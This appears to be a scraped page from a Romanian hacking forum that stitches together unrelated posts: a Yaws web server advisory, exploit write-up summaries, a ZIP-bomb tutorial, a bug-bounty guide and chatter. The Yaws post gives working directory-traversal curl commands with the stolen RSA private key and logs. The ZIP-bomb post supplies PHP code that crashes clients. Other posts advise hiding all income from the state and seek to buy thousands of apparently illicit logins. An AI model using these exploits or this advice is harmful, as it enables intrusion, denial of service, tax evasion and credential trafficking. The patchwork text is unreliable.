Leaderboard

[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: ========== yaws.hyber.org Product: =========== Yaws v1.91 (Yet Another Web Server) Yaws is a HTTP high perfomance 1.1 webserver particularly well suited for dynamic-content web applications. Two separate modes of operations are supported: Standalone mode where Yaws runs as a regular webserver daemon. This is the default mode. Embedded mode where Yaws runs as an embedded webserver in another Erlang application. Vulnerability Type: =================== Unauthenticated Remote File Disclosure CVE Reference: ============== CVE-2017-10974 Security Issue: ================ Remote attackers who can reach Yaws web server can read the server SSL private key file using directory traversal attacks, access logs are also disclosed etc... this version is somewhat old, however, still avail for download as of the time of this writing. http://yaws.hyber.org/download/ Exploit/POC: ============= Steal Yaws Server SSL private key ".pem" file. curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem -----BEGIN RSA PRIVATE KEY----- MIICWwIAAAKBgQDMJHAcJXB9TzkYg/ghXNjOAp3zcgKC4XZo4991SPGYukKVU1Fv RX0YgPx3wz8Ae7ykPg0KW7O3D9Pn8liazTYEaXskNKAzOFr1gtBd7p937PKNQk++ 3/As5EfJjz+lBrwUGbSicJgldJk3Cj89htMUqGwL2Bl/yOQIsZtyLlrP1wIDAQAB AoGAYgEwTWLwAUjSaWGs8zJm52g8Ok7Gw+CfNzYG5oCxdBgftR693sSmjOgHzNtQ WMQOyW7eDBYATmdr3VPsk8znHBSfQ19gAJjR89lJ6lt5qDMNtXMUWILn91g+RbkO gmTkhD8uc0e/3FJBwPxFJWQzFEcAR4jNFJwhNzg6CO8CK/ECQQD7sNzvMRnUi1RQ tiKgRxdjdEwNh52OUPwuJWhKdBLIpHBAJxCBHJB+1N0ufpqaEgUfJ5+gEYrBRMJh aTCIJul5AkEAz6MsmkMz6Iej5zlKrlDL5q6GU+wElXK/F1H8tN/JchoSXN8BRCJZ DLpK0mcMN4yukHKDCo0LD9NBlRQFDll/zwJASb2CrW2kVLpRhKgoMu9BMflDwv8G IcqmZ9q72HxzeGd9H76SPlGhIBe7icC8CQHYkE0qnlolXgSIMsP/3RQReQJAYHnt +INvNAUKSB6br6EFDNtcuNO6UYJufbRvmc89d5HbpGFN4k2fWMWajGarC4iHd8Bt WNKuKB09pLoXm1JEiwJAfRtIXE6sr4MQOL6aWwGElw+Yb4B1WBhBiPRRwGTX0nzN HXF3851+kgZBZjjzA3Ib2nr5PeXkZBBLE/4jJvRPRA== -----END RSA PRIVATE KEY----- --- OR Read the access logs. --- curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY> <H1>Not Found</H1>The requested URL /../logs/localhost.8080.access was not found on this server.<P><HR> <address> Yaws 1.91 Server at localhost:8080 </address> </BODY></HTML>[root@localhost ~]# Then, curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" etc... Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ================================= Vendor Notification: June 26, 2017 No replies July 7, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx Source

Hi all, while surfing various IRC Channels, i have come across a list of very useful links, courses to get into hacking URL: https://ghostbin.com/paste/j858d There are courses for computer basics, hacking, programming and many more Good luck in your long journey of learning!

Arata si mie un fotbalist cu iq mai mare decat laba piciorului.

TSIG authentication bypass through signature forgery in ISC BIND Synacktiv experts discovered a flaw within the TSIG protocol implementation in BIND that would allow an attacker knowing a valid key name to bypass the TSIG authentication on zone updates, notify and transfers operations. This issue is due to the fact that when a wrong TSIG digest length is provided (aka the digest doesn’t have a length that matches the hash algorithm used), the server still signs its answer by using the provided digest as a prefix. This allows an attacker to forge the signature of a valid request, hence bypassing the TSIG authentication. Download: http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf

Publicat pe 5 iul. 2017 Ad-hoc session working on pivoted packets through Meterpreter. Not finished, more to do, but small chunks of progress.

How to defend your website with ZIP bombs the good old methods still work today Posted by Christian Haschek on 2017-07-05 [update] I'm on some list now that I have written an article about some kind of "bomb", ain't I? If you have ever hosted a website or even administrated a server you'll be very well aware of bad people trying bad things with your stuff. When I first hosted my own little linux box with SSH access at age 13 I read through the logs daily and report the IPs (mostly from China and Russia) who tried to connect to my sweet little box (which was actually an old ThinkPad T21 with a broken display running under my bed) to their ISPs. Actually if you have a linux server with SSH exposed you can see how many connection attempts are made every day: grep 'authentication failures' /var/log/auth.log Hundreds of failed login attempts even though this server has disabled password authentication and runs on a non-standard port Wordpress has doomed us all Ok to be honest, web vulnerability scanners have existed before Wordpress but since WP is so widely deployed most web vuln scanners include scans for some misconfigured wp-admin folders or unpatched plugins. So if a small, new hacking group wants to gain some hot cred they'll download one of these scanner things and start testing against many websites in hopes of gaining access to a site and defacing it. Sample of a log file during a scan using the tool Nikto This is why all server or website admins have to deal with gigabytes of logs full with scanning attempts. So I was wondering.. Is there a way to strike back? After going through some potential implementations with IDS or Fail2ban I remembered the old ZIP bombs from the old days. WTH is a ZIP bomb? So it turns out ZIP compression is really good with repetitive data so if you have a really huge text file which consists of repetitive data like all zeroes, it will compress it really good. Like REALLY good. As 42.zip shows us it can compress a 4.5 peta byte (4.500.000 giga bytes) file down to 42 kilo bytes. When you try to actually look at the content (extract or decompress it) then you'll most likely run out of disk space or RAM. How can I ZIP bomb a vuln scanner? Sadly, web browsers don't understand ZIP, but they do understand GZIP. So firstly we'll have to create the 10 giga byte GZIP file filled with zeroes. We could make multiple compressions but let's keep it simple for now. dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip Creating the bomb and checking its size As you can see it's 10 MB large. We could do better but good enough for now. Now that we have created this thing, let's set up a PHP script that will deliver it to a client. <?php //prepare the client to recieve GZIP data. This will not be suspicious //since most web servers use GZIP by default header("Content-Encoding: gzip"); header("Content-Length: ".filesize('10G.gzip')); //Turn off output buffering if (ob_get_level()) ob_end_clean(); //send the gzipped file to the client readfile('10G.gzip'); That's it! So we could use this as a simple defense like this: <?php $agent = lower($_SERVER['HTTP_USER_AGENT']); //check for nikto, sql map or "bad" subfolders which only exist on wordpress if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/')) { sendBomb(); exit(); } function sendBomb(){ //prepare the client to recieve GZIP data. This will not be suspicious //since most web servers use GZIP by default header("Content-Encoding: gzip"); header("Content-Length: ".filesize('10G.gzip')); //Turn off output buffering if (ob_get_level()) ob_end_clean(); //send the gzipped file to the client readfile('10G.gzip'); } function startsWith($haystack,$needle){ return (substr($haystack,0,strlen($needle)) === $needle); } This script obviously is not - as we say in Austria - the yellow of the egg, but it can defend from script kiddies I mentioned earlier who have no idea that all these tools have parameters to change the user agent. Sooo. What happens when the script is called? Client Result IE 11 Memory rises, IE crashes Chrome Memory rises, error shown Edge Memory rises, then dripps and loads forever Nikto Seems to scan fine but no output is reported SQLmap High memory usage until crash (if you have tested it with other devices/browsers/scripts, please let me know and I'll add it here) Reaction of the script called in Chrome If you're a risk taker: Try it yourself Sursa: https://blog.haschek.at/post/f2fda

Kernel Pool Overflow Exploitation In Real World – Windows 7 1) Introduction This article will focus on a vulnerability (CVE-2017-6008) we identified in the HitmanPro standalone scan version 3.7.15 – Build 281. This tool is a part of the HitmanPro.Alert solution and has been integrated in the Sophos solutions as SophosClean.exe. The vulnerability has been reported to Sophos in February 2017. The version 3.7.20 – Build 286 patched the vulnerability in May 2017. We discovered the first crash while playing with Ioctlfuzzer [1]. Ioctlfuzzer is a great and simple tool made to fuzz the I/O Request Packets (IRP). The fuzzer hooks the DeviceIoControlFile API function and place itself as a man in the middle. For each IRP the fuzzer receives, it lands severals malformed IRP before sending the original one. The first crash occured at the very beginning of the scan, in the Initialization phase, with a BAD_POOL_HEADER code. Before going deeper, I strongly recommand readers learn a bit more on IOCTL and IRP on Windows. The MSDN documentation provides a lot of informations you must know to fully understand this article. This blogpost will be focused on x64 architectures, since it’s harder to exploit than x32 architectures. Article: http://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/

Publicat pe 5 iul. 2017 Live workshop walkthrough for the TI addr_limit bug Using syscalls in the kernel (or simply forgetting to reset the addr_limit value before returning to user space) may lead to this type of bugs. We're using a stack info leak with the buggy get_fs/set_fs code to overwrite the (e)uid and (e)gid of the current process to elevate privileges.

Exercitii: http://malware-traffic-analysis.net/training-exercises.html Tutoriale: http://malware-traffic-analysis.net/tutorials/index.html

Nu trebuie sa fii niciun rezident intr-un paradis fiscal. Folosesti doar servicii din afara tarii pentru plati (cont bancar, firma si toate cele), astfel incat in tara pulei sa nu figurati cu niciun venit. Nu declarati absolut niciun venit la statul roman ticalosit. Nu vi se ofera nimic pe banii aia. - Nu deschideti firme in romania. Veti deveni prostituate iar statul pestele vostru. 80% din bani merg la stat. - Nu va faceti conturi bancare si carduri in Romania. In orice moment va puteti trezi cu conturile blocate sau verificati de ticalosi. - Daca va intreaba vreo curva de functionara cu ce traiti, spuneti ca futeti babe contra mancare si bautura si ca puteti oferi discount in cazul in care e interesata. Da-i in pula mea, nu e treaba lor.

BSidesCharm 2017 T111 Microsoft Patch Analysis for Exploitation Stephen Sims

Step 1) Start reading! There are some go-to books that you can buy to help you learn the basics and essentials of penetration testing and bug hunting. Since bug bounties often include website targets, we’ll focus on getting you started with Web Hacking and later we’ll branch out. Note -> It's very important to focus on an area of hacking that is interesting & exciting to you. Focus on that one area and pick up new things as you go, but don’t try to be the “ultimate hacker” and learn everything. The greatest hackers on Bugcrowd have specialities and areas of interest, but they don’t know how to hack everything. Hacking is a lifelong journey of learning. Your two go-to books are the following: The Web Application Hacker’s Handbook256 This is an absolute must-read and considered the web-app hacker’s ‘bible’. This book starts from square one, walking you through getting Kali Linux installed all the way through using tools and finding exploits. OWASP Testing Guide v4968 Highly suggested by Bugcrowd’s Jason Haddix For further reading: Penetration Testing102 The Hacker Playbook 2: Practical Guide to Penetration Testing75 And for our Mobile hacking friends: The Mobile Application Hacker’s Handbook50 iOS Application Security27 Step 2) Practice what you’re learning! While you’re learning it’s important to make sure that you’re also understanding and retaining what you learn. Practicing on vulnerable applications and systems is a great way to test your skills in simulated environments. These will give you an idea of what you’ll run up against in the real world. Hacksplaining1.1k This is a great site to learn a bit more about various web hacking techniques and how they’re done. It’s actually more of a practical walk-through. Super useful! Penetration Testing Practice Labs911 This site has a massive list of practice apps and systems for several hacking scenarios. Use this list to find new testing labs and sites to practice your skills. Step 3) Read tech write-ups and POCs (Proof of Concepts) from other hackers and watch tutorials on YouTube! Now that you’ve got a baseline understanding of how to find and exploit security vulnerabilities, it’s time to start checking out what other hackers are finding in the wild. Luckily the security community is quite generous with sharing knowledge and we’ve collected a list of write-ups & tutorials: Bug Bounty write-ups and POCs Collection of bug reports from successful bug bounty hunters. Bug Hunting Tutorials Our collection of great tutorials from the Bugcrowd community and beyond. /r/Netsec on Reddit236 Netsec on Reddit is almost exclusively tech writeups and POCs from other researchers. A fantastic resource. JackkTutorials on YouTube330 Jackk has created many tutorials that walk you through CSRF, XSS, SQL Injection, Target Discovery and much more. DEFCON Conference videos on YouTube118 Watch all of the talks from DEFCON over the years. Very useful resource. Hak5 on YouTube112 Hak5 typically focuses on hardware hacking, but in addition to that they also have the ‘Metasploit Minute’ show, HakTip: NMap and much more. Awesome-Infosec189 This is a curated list of helpful security resources that covers many different topics and areas. Step 3-A) Gather your arsenal of tools Tools don’t make the hacker, but they’re certainly helpful! Bugcrowd has curated an extensive list of tools that you can add to your bag of tricks: Bugcrowd Researcher Resources - Tools Step 4) Join the community! You’re joining a global community of over 29,000 hackers. Luckily many of these hackers are happy to share their knowledge with a fellow polite & curious researcher. Follow White-Hat Hackers on Twitter269 A list of bug bounty hunters that you should be following. Join the #Bugcrowd IRC channel103 to talk to over 100 security researchers Follow @Bugcrowd on Twitter62 to keep up with the latest infosec news Join the Bugcrowd Forum57 for more resources & to chat with other researchers Step 5) Start learning about bug bounties Okay, now you’re at the point where it’s almost time to start hunting for bounties. But first, let’s learn how bug bounties work and how to get started, just to make sure we maximize our chances of success. How to approach a target Advice from other bug hunters that will help you find more success when approaching a bug bounty. How to write a Great Vulnerability Report100 This will walk you through how to write a great vulnerability report. The better your report, the higher chance you will get a bounty! How to write a Proof of Concept65 Proof of Concepts show the customer how your bug is exploited and that it works. This is crucial to being rewarded successfully. How to Report a Bug51 Our walkthrough for reporting a bug via the Bugcrowd platform. Bug Bounty Disclosure Policy46 These are the rules of the road. It’s very important that you understand the bounty program’s bounty brief and disclosure policy. Read the Bounty Hunter's Methodology This is a presentation that @jhaddix gave at DEFCON last year and it's a super useful look at how successful bounty hunters find bugs. Check out the Github and watch the video88. How To Shot Web - Jason Haddix's talk from DEFCON23 Step 6) Get hacking! It’s time to start hacking! When you’re new and getting started, it’s probably best not to try hacking the most popular bug bounties out there. Trying to hack Tesla Motors, Facebook, Pinterest and others will likely end in frustration for beginners, as those companies are very popular and are more secure because they receive many bug reports. Go for the Kudos only programs297 Instead, focus on bug bounties that have likely been overlooked by others. These are often bug bounties that don’t pay rewards but instead offer kudos points on Bugcrowd. These ‘kudos points only’ programs297 are a fantastic way to get started with bug bounties and to show your skills to Bugcrowd. After you’ve submitted some valid bugs to Bugcrowd, even if they’re kudos rewards only, you will likely start receiving invites to private bounty programs. The private bounty programs are invitation only and restricted to a small number of people, which means less competition and a higher likelihood of successfully finding a bug. Step 7) Always Be Learning & Networking Like we mentioned earlier, hacking is a lifelong journey of learning. This is what makes this field so exciting! There are always new articles and presentations to learn from, interesting people to meet at conferences or local meetups, and new opportunities to pursue. Bug bounties are a fantastic way to enter the InfoSec community and build your career. Use bug bounties as a way to make extra money, improve your skills, meet new people, and even build out your resume. Remember, always act professional and treat people well. This is a small community and we like to take care of each other - you never know who you might meet!

Salut , ma numesc Razvan , online voi fii Razwy.Inca de mic am fost pasionat de doua lucruri IT si fotbal pana acum nu faceam prea multe lucruri pe PC doar chestii clasice pentru un incepator in IT nu am habar de prea multe denumiri dar am intrat pe acest forum cu scopul de a invata cat mai multe pentru ca vreau sa-mi dezvolt cunostintele IT. Pentru prietenii de la bloc sunt avansat in IT pentru voi cei de aici cu siguranta un incepator. Inca de mic am fost pasionat de hacking dar singurul lucru legat de asta era sa ma joc cu keyloggere , hack-uri pe toate jocurile si diferite chestii banale. Pe aceasta comunitate vreau sa invat cat mai multe. Detin un ASUS R510V 8GB RAM , i7 etc. De azi sper sa fiu activ pe aici si sa ne intelegem cat mai bine ! P.S. : Am 17 ani si sunt din Ramnicu Valcea cred ca ati auzit cate ceva despre acest oras.

Salutare, Dupa cum spune si titlul, as vrea sa cumpar un numar destul de mare de nologine ( 15-20k+ ) pentru tunnel. Daca mai este cineva pe aici care se ocupa sau poate face rost il rog sa imi lase un PM.